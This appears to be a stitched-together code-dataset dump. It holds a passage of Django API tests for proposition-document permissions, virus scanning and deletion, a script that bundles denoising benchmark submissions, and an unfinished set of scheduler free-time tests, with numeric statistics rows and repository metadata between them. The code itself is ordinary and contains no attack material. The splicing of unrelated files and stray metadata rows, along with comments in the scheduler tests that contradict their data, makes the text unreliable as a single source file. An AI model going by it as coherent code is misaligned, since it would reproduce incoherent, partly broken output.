def test_documents_list(self, permissions):
"""Tests list endpoint."""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
# document that is pending to be deleted, shouldn't be in the list
entity_document_to_be_deleted = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test2.txt',
created_by=user,
)
entity_document_to_be_deleted.document.mark_deletion_pending()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
response_data = response.data
assert response_data['count'] == 1
assert len(response_data['results']) == 1
assert response_data['results'][0] == {
'id': str(entity_document.pk),
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'av_clean': True,
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_can_list_associated_documents(self):
"""Test that restricted user can list associated documents."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(True, '')
# document that is pending to be deleted, shouldn't be in the list
entity_document_to_be_deleted = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test2.txt',
created_by=user,
)
entity_document_to_be_deleted.document.mark_deletion_pending()
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
response_data = response.data
assert response_data['count'] == 1
assert len(response_data['results']) == 1
assert response_data['results'][0] == {
'id': str(entity_document.pk),
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'av_clean': True,
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_cannot_list_non_associated_documents(self):
"""Tests that restricted user cannot list non associated documents."""
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=project_creator,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:document-collection',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
},
)
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_associated,),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_document_retrieval(self, permissions):
"""Tests retrieval of individual document."""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
assert response.data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.NOT_VIRUS_SCANNED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_can_retrieve_associated_document(self):
"""Test that restricted user can retrieve individual associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_200_OK
assert response.data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.NOT_VIRUS_SCANNED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
def test_restricted_user_cannot_retrieve_non_associated_document(self):
"""Test that restricted user cannot retrieve individual non associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_associated,),
dit_team=TeamFactory(),
)
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=project_creator,
)
entity_document.document.mark_as_scanned(True, '')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_document_with_deletion_pending_retrieval(self, permissions):
"""Tests retrieval of individual document that is pending deletion."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
entity_document.document.mark_deletion_pending()
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_404_NOT_FOUND
@pytest.mark.parametrize(
'av_clean,expected_status', (
(True, status.HTTP_200_OK),
(False, status.HTTP_403_FORBIDDEN),
),
)
@patch('datahub.documents.models.sign_s3_url')
def test_document_download(self, sign_s3_url, av_clean, expected_status):
"""Tests download of individual document."""
sign_s3_url.return_value = 'http://what'
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.view_all,),
)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
entity_document.document.mark_as_scanned(av_clean, '')
url = reverse(
'api-v3:investment:proposition:document-item-download',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == expected_status
if response.status_code == status.HTTP_200_OK:
assert response.data == {
'id': str(entity_document.pk),
'av_clean': True,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNED,
'document_url': 'http://what',
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
@pytest.mark.parametrize('permissions', NON_RESTRICTED_VIEW_PERMISSIONS)
def test_document_download_when_not_scanned(self, permissions):
"""Tests download of individual document when not yet virus scanned."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
url = reverse(
'api-v3:investment:proposition:document-item-download',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.get(url)
assert response.status_code == status.HTTP_503_SERVICE_UNAVAILABLE
@pytest.mark.parametrize('permissions', NON_RESTRICTED_CHANGE_PERMISSIONS)
@patch('datahub.documents.tasks.virus_scan_document.apply_async')
def test_document_upload_schedule_virus_scan(
self,
virus_scan_document_apply_async,
permissions,
):
"""Tests scheduling virus scan after upload completion.
Checks that a virus scan of the document was scheduled. Virus scanning is
tested separately in the documents app.
"""
user = create_test_user(permission_codenames=permissions)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
url = reverse(
'api-v3:investment:proposition:document-item-callback',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_200_OK
entity_document.document.refresh_from_db()
assert response.data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNING_SCHEDULED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
virus_scan_document_apply_async.assert_called_once_with(
args=(str(entity_document.document.pk), ),
)
@patch('datahub.documents.tasks.virus_scan_document.apply_async')
def test_restricted_user_can_schedule_virus_scan_for_associated_document(
self,
virus_scan_document_apply_async,
):
"""
Test that restricted user can schedule a virus scan for associated document.
"""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.change_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
url = reverse(
'api-v3:investment:proposition:document-item-callback',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_200_OK
entity_document.document.refresh_from_db()
assert response.data == {
'id': str(entity_document.pk),
'av_clean': None,
'created_by': {
'id': str(entity_document.created_by.pk),
'first_name': entity_document.created_by.first_name,
'last_name': entity_document.created_by.last_name,
'name': entity_document.created_by.name,
},
'original_filename': 'test.txt',
'url': _get_document_url(entity_document.proposition, entity_document),
'status': UploadStatus.VIRUS_SCANNING_SCHEDULED,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
}
virus_scan_document_apply_async.assert_called_once_with(
args=(str(entity_document.document.pk), ),
)
def test_restricted_user_cannot_schedule_virus_scan_for_non_associated_document(self):
"""Test that restricted user cannot schedule a virus scan for non associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.change_associated,),
dit_team=TeamFactory(),
)
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=project_creator,
)
url = reverse(
'api-v3:investment:proposition:document-item-callback',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
entity_document.document.refresh_from_db()
assert entity_document.document.status == UploadStatus.NOT_VIRUS_SCANNED
@pytest.mark.parametrize('permissions', NON_RESTRICTED_DELETE_PERMISSIONS)
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_document_delete(self, delete_document, permissions):
"""Tests document deletion."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
document_pk = entity_document.document.pk
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
delete_document.assert_called_once_with(args=(document_pk, ))
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_restricted_user_can_delete_associated_document(self, delete_document):
"""Test that restricted user can delete associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.delete_associated,),
dit_team=TeamFactory(),
)
investment_project = InvestmentProjectFactory(
created_by=user,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=user,
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
document_pk = entity_document.document.pk
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
delete_document.assert_called_once_with(args=(document_pk, ))
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_restricted_user_cannot_delete_non_associated_document(self, delete_document):
"""Test that restricted user cannot delete non associated document."""
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.delete_associated,),
dit_team=TeamFactory(),
)
project_creator = AdviserFactory()
investment_project = InvestmentProjectFactory(
created_by=project_creator,
)
proposition = PropositionFactory(
investment_project=investment_project,
)
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk,
original_filename='test.txt',
created_by=project_creator,
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert response.data == {
'detail': 'You do not have permission to perform this action.',
}
entity_document.document.refresh_from_db()
assert entity_document.document.status == UploadStatus.VIRUS_SCANNED
assert delete_document.called is False
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_document_delete_without_permission(self, delete_document):
"""Tests user can't delete document without permissions."""
user = create_test_user(
permission_codenames=(),
dit_team=TeamFactory(),
)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
entity_document.document.mark_scan_scheduled()
entity_document.document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.delete(url)
assert response.status_code == status.HTTP_403_FORBIDDEN
assert delete_document.called is False
@pytest.mark.parametrize('permissions', NON_RESTRICTED_DELETE_PERMISSIONS)
@patch('datahub.documents.tasks.delete_document.apply_async')
def test_document_delete_creates_user_event_log(self, delete_document, permissions):
"""Tests document deletion creates user event log."""
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
document_pk = entity_document.document.pk
expected_user_event_data = {
'id': str(entity_document.pk),
'url': entity_document.url,
'status': entity_document.document.status,
'av_clean': entity_document.document.av_clean,
'created_by': None,
'created_on': format_date_or_datetime(entity_document.created_on),
'uploaded_on': format_date_or_datetime(entity_document.document.uploaded_on),
'original_filename': entity_document.original_filename,
'proposition_id': str(entity_document.proposition_id),
}
user = create_test_user(permission_codenames=permissions)
api_client = self.create_api_client(user=user)
frozen_time = datetime.datetime(2018, 1, 2, 12, 30, 50, tzinfo=utc)
with freeze_time(frozen_time):
response = api_client.delete(url)
assert response.status_code == status.HTTP_204_NO_CONTENT
delete_document.assert_called_once_with(args=(document_pk, ))
assert UserEvent.objects.count() == 1
user_event = UserEvent.objects.first()
assert user_event.adviser == user
assert user_event.type == UserEventType.PROPOSITION_DOCUMENT_DELETE
assert user_event.timestamp == frozen_time
assert user_event.api_url_path == url
assert user_event.data == expected_user_event_data
@patch.object(Document, 'mark_deletion_pending')
def test_document_delete_failure_wont_create_user_event_log(self, mark_deletion_pending):
"""Tests document deletion failure won't create user event log."""
mark_deletion_pending.side_effect = Exception('No way!')
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
document = entity_document.document
document.mark_scan_scheduled()
document.mark_as_scanned(True, 'reason')
url = reverse(
'api-v3:investment:proposition:document-item',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
user = create_test_user(
permission_codenames=(PropositionDocumentPermission.delete_all,),
dit_team=TeamFactory(),
)
api_client = self.create_api_client(user=user)
with pytest.raises(Exception):
api_client.delete(url)
assert UserEvent.objects.count() == 0
def test_document_upload_status_no_status_without_permission(self):
"""Tests user without permission can't call upload status endpoint."""
user = create_test_user(
permission_codenames=(),
dit_team=TeamFactory(),
)
proposition = PropositionFactory()
entity_document = PropositionDocument.objects.create(
proposition_id=proposition.pk, original_filename='test.txt',
)
url = reverse(
'api-v3:investment:proposition:document-item-callback',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
api_client = self.create_api_client(user=user)
response = api_client.post(url, data={})
assert response.status_code == status.HTTP_403_FORBIDDEN
def _get_document_url(proposition, entity_document):
return reverse(
'api-v3:investment:proposition:document-item-download',
kwargs={
'proposition_pk': proposition.pk,
'project_pk': proposition.investment_project.pk,
'entity_document_pk': entity_document.pk,
},
)
| 39.297388 | 98 | 0.616752 | 8,977 | 93,292 | 6.113958 | 0.035981 | 0.051016 | 0.022848 | 0.029371 | 0.914366 | 0.899499 | 0.874428 | 0.855771 | 0.82671 | 0.808418 | 0 | 0.006609 | 0.289628 | 93,292 | 2,373 | 99 | 39.313949 | 0.821569 | 0.046724 | 0 | 0.733106 | 0 | 0 | 0.117947 | 0.039289 | 0 | 0 | 0 | 0 | 0.073408 | 1 | 0.031113 | false | 0 | 0.009237 | 0.000486 | 0.045698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fc6a242624e77d2e83c43577bc5772b16936856b | 3,587 | py | Python | utils/bundle_submissions.py | zhanzhibingshang/deblurganv2_mirnet | 12fcc94ee0ff33335c557cf46a776a13cae3804b | [
"BSD-3-Clause"
] | null | null | null | utils/bundle_submissions.py | zhanzhibingshang/deblurganv2_mirnet | 12fcc94ee0ff33335c557cf46a776a13cae3804b | [
"BSD-3-Clause"
] | null | null | null | utils/bundle_submissions.py | zhanzhibingshang/deblurganv2_mirnet | 12fcc94ee0ff33335c557cf46a776a13cae3804b | [
"BSD-3-Clause"
] | 1 | 2021-01-12T13:31:36.000Z | 2021-01-12T13:31:36.000Z | # Author: Tobias Plötz, TU Darmstadt (tobias.ploetz@visinf.tu-darmstadt.de)
# This file is part of the implementation as described in the CVPR 2017 paper:
# Tobias Plötz and Stefan Roth, Benchmarking Denoising Algorithms with Real Photographs.
# Please see the file LICENSE.txt for the license governing this code.
import numpy as np
import scipy.io as sio
import os
import h5py
def bundle_submissions_raw(submission_folder,session):
'''
Bundles submission data for raw denoising
submission_folder Folder where denoised images reside
Output is written to <submission_folder>/bundled/. Please submit
the content of this folder.
'''
out_folder = os.path.join(submission_folder, session)
# out_folder = os.path.join(submission_folder, "bundled/")
try:
os.mkdir(out_folder)
except:pass
israw = True
eval_version="1.0"
for i in range(50):
Idenoised = np.zeros((20,), dtype=np.object)
for bb in range(20):
filename = '%04d_%02d.mat'%(i+1,bb+1)
s = sio.loadmat(os.path.join(submission_folder,filename))
Idenoised_crop = s["Idenoised_crop"]
Idenoised[bb] = Idenoised_crop
filename = '%04d.mat'%(i+1)
sio.savemat(os.path.join(out_folder, filename),
{"Idenoised": Idenoised,
"israw": israw,
"eval_version": eval_version},
)
def bundle_submissions_srgb(submission_folder,session):
'''
Bundles submission data for sRGB denoising
submission_folder Folder where denoised images reside
Output is written to <submission_folder>/bundled/. Please submit
the content of this folder.
'''
out_folder = os.path.join(submission_folder, session)
# out_folder = os.path.join(submission_folder, "bundled/")
try:
os.mkdir(out_folder)
except:pass
israw = False
eval_version="1.0"
for i in range(50):
Idenoised = np.zeros((20,), dtype=np.object)
for bb in range(20):
filename = '%04d_%02d.mat'%(i+1,bb+1)
s = sio.loadmat(os.path.join(submission_folder,filename))
Idenoised_crop = s["Idenoised_crop"]
Idenoised[bb] = Idenoised_crop
filename = '%04d.mat'%(i+1)
sio.savemat(os.path.join(out_folder, filename),
{"Idenoised": Idenoised,
"israw": israw,
"eval_version": eval_version},
)
def bundle_submissions_srgb_v1(submission_folder,session):
'''
Bundles submission data for sRGB denoising
submission_folder Folder where denoised images reside
Output is written to <submission_folder>/bundled/. Please submit
the content of this folder.
'''
out_folder = os.path.join(submission_folder, session)
# out_folder = os.path.join(submission_folder, "bundled/")
try:
os.mkdir(out_folder)
except:pass
israw = False
eval_version="1.0"
for i in range(50):
Idenoised = np.zeros((20,), dtype=np.object)
for bb in range(20):
filename = '%04d_%d.mat'%(i+1,bb+1)
s = sio.loadmat(os.path.join(submission_folder,filename))
Idenoised_crop = s["Idenoised_crop"]
Idenoised[bb] = Idenoised_crop
filename = '%04d.mat'%(i+1)
sio.savemat(os.path.join(out_folder, filename),
{"Idenoised": Idenoised,
"israw": israw,
"eval_version": eval_version},
) | 33.212963 | 89 | 0.618065 | 443 | 3,587 | 4.873589 | 0.221219 | 0.133395 | 0.055581 | 0.083372 | 0.844836 | 0.844836 | 0.844836 | 0.823066 | 0.823066 | 0.823066 | 0 | 0.021211 | 0.277112 | 3,587 | 108 | 90 | 33.212963 | 0.811415 | 0.29356 | 0 | 0.8125 | 0 | 0 | 0.077901 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.046875 | false | 0.046875 | 0.0625 | 0 | 0.109375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
fc70ecc9a34f45288fcd76491cf737aa8292c16b | 10,284 | py | Python | test.py | ian-garrett/meetMe | 3cd23f3693a3e5e476a1a1ef58c1df9027333973 | [
"Artistic-2.0"
] | null | null | null | test.py | ian-garrett/meetMe | 3cd23f3693a3e5e476a1a1ef58c1df9027333973 | [
"Artistic-2.0"
] | 2 | 2021-02-08T20:18:47.000Z | 2021-04-30T20:33:11.000Z | test.py | ian-garrett/meetMe | 3cd23f3693a3e5e476a1a1ef58c1df9027333973 | [
"Artistic-2.0"
] | 1 | 2022-03-12T03:55:54.000Z | 2022-03-12T03:55:54.000Z | import main
import nose
import arrow
import datetime
##### NOSE TEST SUITE INCLUDES:
# - 1 one-event test
# - 7 two-event tests to check all base cases for two events with various types of overlap
# - 2 complete distaster tests
#####
def testCase1():
# test case to test one event
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T11:00:00-08:00')}
entryList = [entry1]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T11:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase2():
# test case to check easiest two-event system: two non-overlapping events
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T11:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T14:00:00-08:00'), 'end':arrow.get('2015-12-10T15:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T11:00:00-08:00]>, <Arrow [2015-12-10T14:00:00-08:00]>], ",
"[<Arrow [2015-12-10T15:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase3():
# test case to check two-event system where both entries have the same start and the second event ends before the first event ends
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T12:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T15:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T15:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase4():
# test case to check two-event system where both entries have the same start and the first event ends before the second event ends
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T18:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T11:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T18:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase5():
# test case to check two-event system where the second entry is engulfed in the first entry
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T18:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T12:00:00-08:00'), 'end':arrow.get('2015-12-10T15:00:00-08:00')}
entryList = [entry1,entry2]
startDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
endDate = arrow.get('2015-12-10T00:00:00-08:00').isoformat()
resultingFreeTimes = str(main.generateFreeTimes(entryList,startDate,endDate))
print("RESULTING")
print(resultingFreeTimes)
expected = ["[[<Arrow [2015-12-10T07:00:00-08:00]>, <Arrow [2015-12-10T10:00:00-08:00]>], ",
"[<Arrow [2015-12-10T18:00:00-08:00]>, <Arrow [2015-12-10T21:00:00-08:00]>]]"]
expected = ''.join(expected)
assert resultingFreeTimes == expected
def testCase6():
# test case to check two-event system where first event end is equal to second event start
entry1 = {'start':arrow.get('2015-12-10T10:00:00-08:00'), 'end':arrow.get('2015-12-10T14:00:00-08:00')}
entry2 = {'start':arrow.get('2015-12-10T14:00:00-08:00'), 'end':arrow.get('2015-12-10T18:00:00-08:00')}
entryList = [entry1,entry2]
